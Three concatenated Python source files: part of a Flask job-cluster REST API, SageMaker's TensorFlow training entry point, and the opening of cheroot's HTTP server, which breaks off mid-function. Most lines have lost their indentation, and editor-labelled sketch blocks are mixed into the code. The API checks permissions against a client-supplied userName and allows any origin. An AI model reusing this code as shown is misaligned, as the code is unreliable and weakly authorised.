defaultMountPath = args["defaultMountPath"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.UpdateStorage(userName, vcName, url, storageType, metadata, defaultMountPath)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(UpdateStorage, '/UpdateStorage')
class Endpoint(Resource):
def get(self):
'''return job["endpoints"]: curl -X GET /endpoints?jobId=...&userName=...'''
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
username = args["userName"]
ret = JobRestAPIUtils.GetEndpoints(username, jobId)
# TODO: return 403 error code
# Return empty list for now to keep backward compatibility with old portal.
resp = generate_response(ret)
return resp
def post(self):
'''set job["endpoints"]: curl -X POST -H "Content-Type: application/json" /endpoints --data "{'jobId': ..., 'endpoints': ['ssh', 'ipython'] }"'''
parser = reqparse.RequestParser()
parser.add_argument('userName')
args = parser.parse_args()
username = args["userName"]
params = request.get_json(silent=True)
job_id = params["jobId"]
requested_endpoints = params["endpoints"]
interactive_ports = []
# endpoints should be ["ssh", "ipython", "tensorboard", {"name": "port name", "podPort": "port on pod in 40000-49999"}]
for interactive_port in [ elem for elem in requested_endpoints if elem not in ["ssh", "ipython", "tensorboard"] ]:
if any(required_field not in interactive_port for required_field in ["name", "podPort"]):
# if ["name", "port"] not in interactive_port:
return ("Bad request, interactive port should have \"name\" and \"podPort\"]: %s" % requested_endpoints), 400
if int(interactive_port["podPort"]) < 40000 or int(interactive_port["podPort"]) > 49999:
return ("Bad request, interactive podPort should in range 40000-49999: %s" % requested_endpoints), 400
if len(interactive_port["name"]) > 16:
return ("Bad request, interactive port name length shoule be less than 16: %s" % requested_endpoints), 400
interactive_ports.append(interactive_port)
msg, statusCode = JobRestAPIUtils.UpdateEndpoints(username, job_id, requested_endpoints, interactive_ports)
if statusCode != 200:
return msg, statusCode
resp = generate_response(msg)
return resp
##
## Actually setup the Endpoint resource routing here
##
api.add_resource(Endpoint, '/endpoints')
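# Illustrative sketch by the editor (not part of the original API): a request
# body that passes the validation in Endpoint.post above -- built-in endpoint
# names plus one custom port whose podPort lies in 40000-49999 and whose name
# is at most 16 characters. The jobId value is a placeholder.
EXAMPLE_ENDPOINTS_REQUEST = {
    "jobId": "<job id>",
    "endpoints": [
        "ssh",
        "ipython",
        {"name": "web-ui", "podPort": "40080"},
    ],
}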
class Templates(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName', location="args")
parser.add_argument('userName', location="args")
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
dataHandler = DataHandler()
ret = dataHandler.GetTemplates("master") or []
ret += dataHandler.GetTemplates("vc:" + vcName) or []
ret += dataHandler.GetTemplates("user:" + userName) or []
dataHandler.Close()
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName', location="args")
parser.add_argument('userName', location="args")
parser.add_argument('database', location="args")
parser.add_argument('templateName', location="args")
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
database = args["database"]
templateName = args["templateName"]
if database == 'master':
if AuthorizationManager.HasAccess(userName, ResourceType.Cluster, "", Permission.Admin):
scope = 'master'
else:
                return 'access denied', 403
elif database == 'vc':
if AuthorizationManager.HasAccess(userName, ResourceType.VC, vcName, Permission.Admin):
scope = 'vc:' + vcName
else:
                return 'access denied', 403
else:
scope = 'user:' + userName
template_json = request.json
if template_json is None:
return jsonify(result=False, message="Invalid JSON")
dataHandler = DataHandler()
ret = {}
ret["result"] = dataHandler.UpdateTemplate(templateName, scope, json.dumps(template_json))
dataHandler.Close()
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
def delete(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName', location="args")
parser.add_argument('userName', location="args")
parser.add_argument('database', location="args")
parser.add_argument('templateName', location="args")
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
database = args["database"]
templateName = args["templateName"]
if database == 'master':
if AuthorizationManager.HasAccess(userName, ResourceType.Cluster, "", Permission.Admin):
scope = 'master'
else:
                return 'access denied', 403
elif database == 'vc':
if AuthorizationManager.HasAccess(userName, ResourceType.VC, vcName, Permission.Admin):
scope = 'vc:' + vcName
else:
                return 'access denied', 403
else:
scope = 'user:' + userName
dataHandler = DataHandler()
ret = {}
ret["result"] = dataHandler.DeleteTemplate(templateName, scope)
dataHandler.Close()
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
api.add_resource(Templates, '/templates')
class JobPriority(Resource):
def get(self):
        job_priorities = JobRestAPIUtils.get_job_priorities()
        resp = jsonify(job_priorities)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('userName', location="args")
args = parser.parse_args()
username = args["userName"]
payload = request.get_json(silent=True)
success, all_job_priorities = JobRestAPIUtils.update_job_priorites(username, payload)
http_status = 200 if success else 400
# Only return job_priorities affected in the POST request
job_priorities = {}
for job_id, _ in list(payload.items()):
if job_id in all_job_priorities:
job_priorities[job_id] = all_job_priorities[job_id]
else:
job_priorities[job_id] = JobRestAPIUtils.DEFAULT_JOB_PRIORITY
resp = jsonify(job_priorities)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
resp.status_code = http_status
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(JobPriority, '/jobs/priorities')
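# Illustrative sketch by the editor (not part of the original API): the JSON
# body accepted by JobPriority.post is assumed to map job ids to integer
# priorities; only the jobs named in the request are echoed back in the reply.
EXAMPLE_JOB_PRIORITY_REQUEST = {
    "<job id 1>": 100,
    "<job id 2>": 50,
}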
@app.route("/metrics")
def metrics():
return Response(prometheus_client.generate_latest(), mimetype=CONTENT_TYPE_LATEST)
if __name__ == '__main__':
    app.run(debug=False, host="0.0.0.0", threaded=True)
|
training.py
|
# Copyright 2018-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'license' file accompanying this file. This file is
# distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import json
import logging
import multiprocessing
import os
import subprocess
import time
import sagemaker_containers.beta.framework as framework
import tensorflow as tf
from sagemaker_tensorflow_container import s3_utils
logger = logging.getLogger(__name__)
SAGEMAKER_PARAMETER_SERVER_ENABLED = 'sagemaker_parameter_server_enabled'
MODEL_DIR = '/opt/ml/model'
def _is_host_master(hosts, current_host):
return current_host == hosts[0]
def _build_tf_config(hosts, current_host, ps_task=False):
"""Builds a dictionary containing cluster information based on number of hosts and number of
parameter servers.
Args:
hosts (list[str]): List of host names in the cluster
current_host (str): Current host name
ps_task (bool): Set to True if this config is built for a parameter server process
(default: False)
Returns:
dict[str: dict]: A dictionary describing the cluster setup for distributed training.
For more information regarding TF_CONFIG:
https://cloud.google.com/ml-engine/docs/tensorflow/distributed-training-details
"""
    # Assign the first host as the master. The remaining hosts, if any, become worker hosts.
    # When there is more than one host, every host also runs a parameter server task.
masters = hosts[:1]
workers = hosts[1:]
ps = hosts if len(hosts) > 1 else None
def host_addresses(hosts, port=2222):
return ['{}:{}'.format(host, port) for host in hosts]
tf_config = {
'cluster': {
'master': host_addresses(masters)
},
'environment': 'cloud'
}
if ps:
tf_config['cluster']['ps'] = host_addresses(ps, port='2223')
if workers:
tf_config['cluster']['worker'] = host_addresses(workers)
if ps_task:
if ps is None:
raise ValueError(
'Cannot have a ps task if there are no parameter servers in the cluster')
task_type = 'ps'
task_index = ps.index(current_host)
elif _is_host_master(hosts, current_host):
task_type = 'master'
task_index = 0
else:
task_type = 'worker'
task_index = workers.index(current_host)
tf_config['task'] = {'index': task_index, 'type': task_type}
return tf_config
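def _example_tf_config():
    """Editor's illustrative sketch, not part of the original module.
    Shows the shape of the dictionary _build_tf_config produces for a
    hypothetical two-host training job, viewed from the second host.
    """
    hosts = ['algo-1', 'algo-2']
    config = _build_tf_config(hosts, current_host='algo-2')
    # Expected result:
    # {'cluster': {'master': ['algo-1:2222'],
    #              'ps': ['algo-1:2223', 'algo-2:2223'],
    #              'worker': ['algo-2:2222']},
    #  'environment': 'cloud',
    #  'task': {'index': 0, 'type': 'worker'}}
    return config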
def _run_ps(env, cluster):
logger.info('Running distributed training job with parameter servers')
cluster_spec = tf.train.ClusterSpec(cluster)
task_index = env.hosts.index(env.current_host)
# Force parameter server to run on cpu. Running multiple TensorFlow processes on the same
# GPU is not safe:
# https://stackoverflow.com/questions/46145100/is-it-unsafe-to-run-multiple-tensorflow-processes-on-the-same-gpu
no_gpu_config = tf.ConfigProto(device_count={'GPU': 0})
server = tf.train.Server(
cluster_spec, job_name='ps', task_index=task_index, config=no_gpu_config
)
multiprocessing.Process(target=lambda: server.join()).start()
def _run_worker(env, cmd_args, tf_config):
env_vars = env.to_env_vars()
env_vars['TF_CONFIG'] = json.dumps(tf_config)
framework.entry_point.run(env.module_dir, env.user_entry_point, cmd_args, env_vars)
def _wait_until_master_is_down(master):
while True:
try:
subprocess.check_call(
['curl', '{}:2222'.format(master)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logger.info('master {} is still up, waiting for it to exit'.format(master))
time.sleep(10)
except subprocess.CalledProcessError:
logger.info('master {} is down, stopping parameter server'.format(master))
return
def train(env, cmd_args):
"""Get training job environment from env and run the training job.
Args:
env (sagemaker_containers.beta.framework.env.TrainingEnv): Instance of TrainingEnv class
"""
parameter_server_enabled = env.additional_framework_parameters.get(
SAGEMAKER_PARAMETER_SERVER_ENABLED, False)
if len(env.hosts) > 1 and parameter_server_enabled:
tf_config = _build_tf_config(hosts=env.hosts, current_host=env.current_host)
logger.info('Running distributed training job with parameter servers')
logger.info('Launching parameter server process')
_run_ps(env, tf_config['cluster'])
logger.info('Launching worker process')
_run_worker(env, cmd_args, tf_config)
if not _is_host_master(env.hosts, env.current_host):
_wait_until_master_is_down(env.hosts[0])
else:
mpi_enabled = env.additional_framework_parameters.get('sagemaker_mpi_enabled')
if mpi_enabled:
runner_type = framework.runner.MPIRunnerType
else:
runner_type = framework.runner.ProcessRunnerType
framework.entry_point.run(env.module_dir, env.user_entry_point, cmd_args, env.to_env_vars(),
runner=runner_type)
def _log_model_missing_warning(model_dir):
pb_file_exists = False
file_exists = False
for dirpath, dirnames, filenames in os.walk(model_dir):
if filenames:
file_exists = True
for f in filenames:
if 'saved_model.pb' in f or 'saved_model.pbtxt' in f:
pb_file_exists = True
path, direct_parent_dir = os.path.split(dirpath)
if not str.isdigit(direct_parent_dir):
logger.warn('Your model will NOT be servable with SageMaker TensorFlow Serving containers. '
'The SavedModel bundle is under directory \"{}\", not a numeric name.'
.format(direct_parent_dir))
if not file_exists:
logger.warn('No model artifact is saved under path {}.'
' Your training job will not save any model files to S3.\n'
'For details of how to construct your training script see:\n'
'https://sagemaker.readthedocs.io/en/stable/using_tf.html#adapting-your-local-tensorflow-script'
.format(model_dir))
elif not pb_file_exists:
logger.warn('Your model will NOT be servable with SageMaker TensorFlow Serving container. '
'The model artifact was not saved in the TensorFlow SavedModel directory structure:\n'
'https://www.tensorflow.org/guide/saved_model#structure_of_a_savedmodel_directory')
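# Editor's note (illustrative, inferred from the checks above rather than from
# any upstream documentation): a layout that triggers neither warning keeps the
# SavedModel under a directory whose direct parent is numeric, for example
#
#     /opt/ml/model/1/saved_model.pb
#     /opt/ml/model/1/variables/
#
# because os.path.split() on that dirpath yields the digit-only parent "1".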
def _model_dir_with_training_job(model_dir, job_name):
if model_dir.startswith('/opt/ml'):
return model_dir
else:
return '{}/{}/model'.format(model_dir, job_name)
def main():
"""Training entry point
"""
hyperparameters = framework.env.read_hyperparameters()
env = framework.training_env(hyperparameters=hyperparameters)
user_hyperparameters = env.hyperparameters
    # If this training job is one of several jobs launched by a hyperparameter tuning run, append the
    # training job name to model_dir so the jobs do not read from/write to the same location.
if '_tuning_objective_metric' in hyperparameters:
model_dir = _model_dir_with_training_job(hyperparameters.get('model_dir'), env.job_name)
logger.info('Appending the training job name to model_dir: {}'.format(model_dir))
user_hyperparameters['model_dir'] = model_dir
s3_utils.configure(user_hyperparameters.get('model_dir'), os.environ.get('SAGEMAKER_REGION'))
train(env, framework.mapping.to_cmd_args(user_hyperparameters))
_log_model_missing_warning(MODEL_DIR)
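# Editor's addition (hypothetical, not taken from the source as captured):
# a standard entry-point guard so the training module can be run directly.
if __name__ == '__main__':
    main()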
|
server.py
|
"""
A high-speed, production ready, thread pooled, generic HTTP server.
For those of you wanting to understand internals of this module, here's the
basic call flow. The server's listening thread runs a very tight loop,
sticking incoming connections onto a Queue::
server = HTTPServer(...)
server.start()
-> while True:
tick()
# This blocks until a request comes in:
child = socket.accept()
conn = HTTPConnection(child, ...)
server.requests.put(conn)
Worker threads are kept in a pool and poll the Queue, popping off and then
handling each connection in turn. Each connection can consist of an arbitrary
number of requests and their responses, so we run a nested loop::
while True:
conn = server.requests.get()
conn.communicate()
-> while True:
req = HTTPRequest(...)
req.parse_request()
-> # Read the Request-Line, e.g. "GET /page HTTP/1.1"
req.rfile.readline()
read_headers(req.rfile, req.inheaders)
req.respond()
-> response = app(...)
try:
for chunk in response:
if chunk:
req.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
if req.close_connection:
return
For running a server you can invoke :func:`start() <HTTPServer.start()>` (it
will run the server forever) or invoke :func:`prepare()
<HTTPServer.prepare()>` and :func:`serve() <HTTPServer.serve()>` like this::
server = HTTPServer(...)
server.prepare()
try:
threading.Thread(target=server.serve).start()
# waiting/detecting some appropriate stop condition here
...
finally:
server.stop()
And now for a trivial doctest to exercise the test suite
>>> 'HTTPServer' in globals()
True
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import os
import io
import re
import email.utils
import socket
import sys
import time
import traceback as traceback_
import logging
import platform
import contextlib
import threading
try:
from functools import lru_cache
except ImportError:
from backports.functools_lru_cache import lru_cache
import six
from six.moves import queue
from six.moves import urllib
from . import connections, errors, __version__
from ._compat import bton, ntou
from ._compat import IS_PPC
from .workers import threadpool
from .makefile import MakeFile, StreamWriter
__all__ = (
'HTTPRequest', 'HTTPConnection', 'HTTPServer',
'HeaderReader', 'DropUnderscoreHeaderReader',
'SizeCheckWrapper', 'KnownLengthRFile', 'ChunkedRFile',
'Gateway', 'get_ssl_adapter_class',
)
IS_WINDOWS = platform.system() == 'Windows'
"""Flag indicating whether the app is running under Windows."""
IS_GAE = os.getenv('SERVER_SOFTWARE', '').startswith('Google App Engine/')
"""Flag indicating whether the app is running in GAE env.
Ref:
https://cloud.google.com/appengine/docs/standard/python/tools
/using-local-server#detecting_application_runtime_environment
"""
IS_UID_GID_RESOLVABLE = not IS_WINDOWS and not IS_GAE
"""Indicates whether UID/GID resolution's available under current platform."""
if IS_UID_GID_RESOLVABLE:
try:
import grp
import pwd
except ImportError:
"""Unavailable in the current env.
This shouldn't be happening normally.
All of the known cases are excluded via the if clause.
"""
IS_UID_GID_RESOLVABLE = False
grp, pwd = None, None
import struct
if IS_WINDOWS and hasattr(socket, 'AF_INET6'):
if not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, 'IPV6_V6ONLY'):
socket.IPV6_V6ONLY = 27
if not hasattr(socket, 'SO_PEERCRED'):
"""
NOTE: the value for SO_PEERCRED can be architecture specific, in
which case the getsockopt() will hopefully fail. The arch
specific value could be derived from platform.processor()
"""
socket.SO_PEERCRED = 21 if IS_PPC else 17
LF = b'\n'
CRLF = b'\r\n'
TAB = b'\t'
SPACE = b' '
COLON = b':'
SEMICOLON = b';'
EMPTY = b''
ASTERISK = b'*'
FORWARD_SLASH = b'/'
QUOTED_SLASH = b'%2F'
QUOTED_SLASH_REGEX = re.compile(b''.join((b'(?i)', QUOTED_SLASH)))
comma_separated_headers = [
b'Accept', b'Accept-Charset', b'Accept-Encoding',
b'Accept-Language', b'Accept-Ranges', b'Allow', b'Cache-Control',
b'Connection', b'Content-Encoding', b'Content-Language', b'Expect',
b'If-Match', b'If-None-Match', b'Pragma', b'Proxy-Authenticate', b'TE',
b'Trailer', b'Transfer-Encoding', b'Upgrade', b'Vary', b'Via', b'Warning',
b'WWW-Authenticate',
]
if not hasattr(logging, 'statistics'):
logging.statistics = {}
class HeaderReader:
"""Object for reading headers from an HTTP request.
Interface and default implementation.
"""
def __call__(self, rfile, hdict=None): # noqa: C901 # FIXME
"""
Read headers from the given stream into the given header dict.
If hdict is None, a new header dict is created. Returns the populated
header dict.
Headers which are repeated are folded together using a comma if their
specification so dictates.
This function raises ValueError when the read bytes violate the HTTP
spec.
You should probably return "400 Bad Request" if this happens.
"""
if hdict is None:
hdict = {}
while True:
line = rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError('Illegal end of headers.')
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError('HTTP requires CRLF terminators')
            if line[:1] in (SPACE, TAB):  # slice keeps the bytes type under Python 3
# It's a continuation line.
v = line.strip()
else:
try:
k, v = line.split(COLON, 1)
except ValueError:
raise ValueError('Illegal header line.')
v = v.strip()
k = self._transform_key(k)
hname = k
if not self._allow_header(k):
continue
if k in comma_separated_headers:
existing = hdict.get(hname)
if existing:
v = b', '.join((existing, v))
hdict[hname] = v
return hdict
def _allow_header(self, key_name):
return True
def _transform_key(self, key_name):
# TODO: what about TE and WWW-Authenticate?
return key_name.strip().title()
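# Editor's illustrative sketch (not part of cheroot): demonstrates how
# HeaderReader title-cases keys and folds repeated comma-separated headers.
def _example_header_reader():
    raw = io.BytesIO(
        b'accept-encoding: gzip\r\n'
        b'Accept-Encoding: br\r\n'
        b'Host: example.test\r\n'
        b'\r\n'
    )
    return HeaderReader()(raw)
    # -> {b'Accept-Encoding': b'gzip, br', b'Host': b'example.test'}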
class DropUnderscoreHeaderReader(HeaderReader):
"""Custom HeaderReader to exclude any headers with underscores in them."""
def _allow_header(self, key_name):
orig = super(DropUnderscoreHeaderReader, self)._allow_header(key_name)
return orig and '_' not in key_name
class SizeCheckWrapper:
"""Wraps a file-like object, raising MaxSizeExceeded if too large.
:param rfile: ``file`` of a limited size
:param int maxlen: maximum length of the file being read
"""
def __init__(self, rfile, maxlen):
"""Initialize SizeCheckWrapper instance."""
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
def _check_length(self):
if self.maxlen and self.bytes_read > self.maxlen:
raise errors.MaxSizeExceeded()
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:returns: chunk from ``rfile``, limited by size if specified
:rtype: bytes
"""
data = self.rfile.read(size)
self.bytes_read += len(data)
self._check_length()
return data
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
        :param int size: maximum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
if size is not None:
data = self.rfile.readline(size)
self.bytes_read += len(data)
self._check_length()
return data
# User didn't specify a size ...
# We read the line in chunks to make sure it's not a 100MB line !
res = []
while True:
data = self.rfile.readline(256)
self.bytes_read += len(data)
self._check_length()
res.append(data)
# See https://github.com/cherrypy/cherrypy/issues/421
if len(data) < 256 or data[-1:] == LF:
return EMPTY.join(res)
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
def __iter__(self):
"""Return file iterator."""
return self
def __next__(self):
"""Generate next file chunk."""
data = next(self.rfile)
self.bytes_read += len(data)
self._check_length()
return data
next = __next__
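# Editor's illustrative sketch (not part of cheroot): SizeCheckWrapper raises
# errors.MaxSizeExceeded as soon as more than ``maxlen`` bytes have been read.
def _example_size_check_wrapper():
    wrapped = SizeCheckWrapper(io.BytesIO(b'x' * 32), maxlen=16)
    wrapped.read(16)       # still within the limit
    try:
        wrapped.read(1)    # pushes bytes_read past maxlen
    except errors.MaxSizeExceeded:
        return True
    return False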
class KnownLengthRFile:
"""Wraps a file-like object, returning an empty string when exhausted.
:param rfile: ``file`` of a known size
:param int content_length: length of the file being read
"""
def __init__(self, rfile, content_length):
"""Initialize KnownLengthRFile instance."""
self.rfile = rfile
self.remaining = content_length
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:rtype: bytes
:returns: chunk from ``rfile``, limited by size if specified
"""
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.read(size)
self.remaining -= len(data)
return data
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
        :param int size: maximum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.readline(size)
self.remaining -= len(data)
return data
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
def __iter__(self):
"""Return file iterator."""
return self
def __next__(self):
"""Generate next file chunk."""
data = next(self.rfile)
self.remaining -= len(data)
return data
next = __next__
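# Editor's illustrative sketch (not part of cheroot): KnownLengthRFile caps
# reads at the declared Content-Length and returns b'' once it is exhausted.
def _example_known_length_rfile():
    body = KnownLengthRFile(io.BytesIO(b'hello world'), content_length=5)
    first = body.read()    # b'hello'
    rest = body.read()     # b'' -- exhausted, even though the stream has more
    return first, rest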
class ChunkedRFile:
"""Wraps a file-like object, returning an empty string when exhausted.
This class is intended to provide a conforming wsgi.input value for
request entities that have been encoded with the 'chunked' transfer
encoding.
:param rfile: file encoded with the 'chunked' transfer encoding
:param int maxlen: maximum length of the file being read
:param int bufsize: size of the buffer used to read the file
"""
def __init__(self, rfile, maxlen, bufsize=8192):
"""Initialize ChunkedRFile instance."""
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
self.buffer = EMPTY
self.bufsize = bufsize
self.closed = False
def _fetch(self):
if self.closed:
return
line = self.rfile.readline()
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise errors.MaxSizeExceeded(
'Request Entity Too Large', self.maxlen,
)
line = line.strip().split(SEMICOLON, 1)
try:
chunk_size = line.pop(0)
chunk_size = int(chunk_size, 16)
except ValueError:
raise ValueError(
'Bad chunked transfer size: {chunk_size!r}'.
format(chunk_size=chunk_size),
)
if chunk_size <= 0:
self.closed = True
return
# if line: chunk_extension = line[0]
if self.maxlen and self.bytes_read + chunk_size > self.maxlen:
raise IOError('Request Entity Too Large')
chunk = self.rfile.read(chunk_size)
self.bytes_read += len(chunk)
self.buffer += chunk
crlf = self.rfile.read(2)
if crlf != CRLF:
raise ValueError(
"Bad chunked transfer coding (expected '\\r\\n', "
'got ' + repr(crlf) + ')',
)
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:returns: chunk from ``rfile``, limited by size if specified
:rtype: bytes
"""
data = EMPTY
if size == 0:
return data
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
if size:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
data += self.buffer
self.buffer = EMPTY
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
        :param int size: maximum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
data = EMPTY
if size == 0:
return data
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
newline_pos = self.buffer.find(LF)
if size:
if newline_pos == -1:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
remaining = min(size - len(data), newline_pos)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
if newline_pos == -1:
data += self.buffer
self.buffer = EMPTY
else:
data += self.buffer[:newline_pos]
self.buffer = self.buffer[newline_pos:]
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def read_trailer_lines(self):
"""Read HTTP headers and yield them.
Returns:
Generator: yields CRLF separated lines.
"""
if not self.closed:
raise ValueError(
'Cannot read trailers until the request body has been read.',
)
while True:
line = self.rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError('Illegal end of headers.')
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise IOError('Request Entity Too Large')
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError('HTTP requires CRLF terminators')
yield line
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
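# Editor's illustrative sketch (not part of cheroot): ChunkedRFile reassembles
# a body sent with the 'chunked' transfer encoding; two chunks followed by the
# terminating zero-size chunk decode back into the original payload.
def _example_chunked_rfile():
    encoded = io.BytesIO(
        b'4\r\nWiki\r\n'
        b'5\r\npedia\r\n'
        b'0\r\n\r\n'
    )
    return ChunkedRFile(encoded, maxlen=0).read()
    # -> b'Wikipedia'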
class HTTPRequest:
"""An HTTP Request (and response).
A single HTTP connection may consist of multiple request/response pairs.
"""
server = None
"""The HTTPServer object which is receiving this request."""
conn = None
"""The HTTPConnection object on which this request connected."""
inheaders = {}
"""A dict of request headers."""
outheaders = []
"""A list of header tuples to write in the response."""
ready = False
"""When True, the request has been parsed and is ready to begin generating
the response. When False, signals the calling Connection that the response
should not be generated and the connection should close."""
close_connection = False
"""Signals the calling Connection that the request should close. This does
not imply an error! The client and/or server may each request that the
connection be closed."""
chunked_write = False
"""If True, output will be encoded with the "chunked" transfer-coding.
This value is set automatically inside send_headers."""
header_reader = HeaderReader()
"""
A HeaderReader instance or compatible reader.
"""
def __init__(self, server, conn, proxy_mode=False, strict_mode=True):
"""Initialize HTTP request container instance.
Args:
server (HTTPServer): web server object receiving this request
conn (HTTPConnection): HTTP connection object for this request
proxy_mode (bool): whether this HTTPServer should behave as a PROXY
server for certain requests
strict_mode (bool): whether we should return a 400 Bad Request when
we encounter a request that a HTTP compliant client should not be
making
"""
self.server = server
self.conn = conn
self.ready = False
self.started_request = False
self.scheme = b'http'
if self.server.ssl_adapter is not None:
self.scheme = b'https'
# Use the lowest-common protocol in case read_request_line errors.
self.response_protocol = 'HTTP/1.0'
self.inheaders = {}
self.status = ''
self.outheaders = []
self.sent_headers = False
self.close_connection = self.__class__.close_connection
self.chunked_read = False
self.chunked_write = self.__class__.chunked_write
self.proxy_mode = proxy_mode
self.strict_mode = strict_mode
def parse_request(self):
"""Parse the next HTTP request start-line and message-headers."""
self.rfile = SizeCheckWrapper(
self.conn.rfile,
self.server.max_request_header_size,
)
try:
success = self.read_request_line()
except errors.MaxSizeExceeded:
self.simple_response(
'414 Request-URI Too Long',
'The Request-URI sent with the request exceeds the maximum '
'allowed bytes.',
)
return
else:
if not success:
return
try:
success = self.read_request_headers()
except errors.MaxSizeExceeded:
self.simple_response(
'413 Request Entity Too Large',
'The headers sent with the request exceed the maximum '
'allowed bytes.',
)
return
else:
if not success:
return
self.ready = True
def read_request_line(self): # noqa: C901 # FIXME
"""Read and parse first line of the HTTP request.
Returns:
bool: True if the request line is valid or False if it's malformed.
"""
# HTTP/1.1 connections are persistent by default. If a client
# requests a page, then idles (leaves the connection open),
# then rfile.readline() will raise socket.error("timed out").
# Note that it does this based on the value given to settimeout(),
# and doesn't need the client to request or acknowledge the close
# (although your TCP stack might suffer for it: cf Apache's history
# with FIN_WAIT_2).
request_line = self.rfile.readline()
# Set started_request to True so communicate() knows to send 408
# from here on out.
self.started_request = True
if not request_line:
return False
if request_line == CRLF:
# RFC 2616 sec 4.1: "...if the server is reading the protocol
# stream at the beginning of a message and receives a CRLF
# first, it should ignore the CRLF."
# But only ignore one leading line! else we enable a DoS.
request_line = self.rfile.readline()
if not request_line:
return False
if not request_line.endswith(CRLF):
self.simple_response(
'400 Bad Request', 'HTTP requires CRLF terminators',
)
return False
try:
method, uri, req_protocol = request_line.strip().split(SPACE, 2)
if not req_protocol.startswith(b'HTTP/'):
self.simple_response(
'400 Bad Request', 'Malformed Request-Line: bad protocol',
)
return False
rp = req_protocol[5:].split(b'.', 1)
if len(rp) != 2:
self.simple_response(
'400 Bad Request', 'Malformed Request-Line: bad version',
)
return False
            rp = tuple(map(int, rp))  # major and minor version numbers must be treated as integers
if rp > (1, 1):
self.simple_response(
'505 HTTP Version Not Supported', 'Cannot fulfill request',
)
return False
except (ValueError, IndexError):
self.simple_response('400 Bad Request', 'Malformed Request-Line')
return False
self.uri = uri
self.method = method.upper()
if self.strict_mode and method != self.method:
